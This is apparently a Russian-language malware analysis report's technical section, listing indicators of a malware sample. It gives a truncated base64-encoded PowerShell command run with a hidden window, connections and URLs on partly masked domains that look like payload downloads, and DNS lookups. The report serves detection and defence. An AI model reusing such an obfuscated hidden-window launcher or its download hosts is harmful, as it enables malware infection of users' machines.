Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAKABnAGUAVAAtAFYAQQByAEkAYQBiAEwAZQAgACcAKgBtAEQAcgAqACcAKQAuAE4AYQBNAGUAWwAzACwAMQAxACwAMgBdAC0ASgBvAGkAbgAnACcAKQAoAG4ARQBXAC0ATwBiAEoARQBDAHQAIABJAG8ALgBDAG8AbQBwAFIARQBTAHMASQBPAG...
- 'me####abolivia.com':80
- 'me####abolivia.com':443
- 'la###traat.com':80
- 'wi##fly.net':80
- 'wi##fly.net':443
- 'pk#.goog':80
- http://me####abolivia.com/3Y133B8PB/
- http://la###traat.com/YkbgfHu07/
- http://wi##fly.net/bsZJm0F/
- http://pk#.goog/gsr1/gsr1.crt
- 'me####abolivia.com':443
- 'wi##fly.net':443
- DNS ASK me####abolivia.com
- DNS ASK la###traat.com
- DNS ASK mo###elo.com
- DNS ASK wi##fly.net
- DNS ASK pk#.goog
- DNS ASK jo###aweb.cz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAKABnAGUAVAAtAFYAQQByAEkAYQBiAEwAZQAgACcAKgBtAEQAcgAqACcAKQAuAE4AYQBNAGUAWwAzACwAMQAxACwAMgBdAC0ASgBvAGkAbgAnACcAKQAoAG4ARQBXAC0ATwBiAEoARQBDAHQAIABJAG8ALgBDAG8AbQBwAFIARQBTAHMASQBPAG...' (со скрытым окном)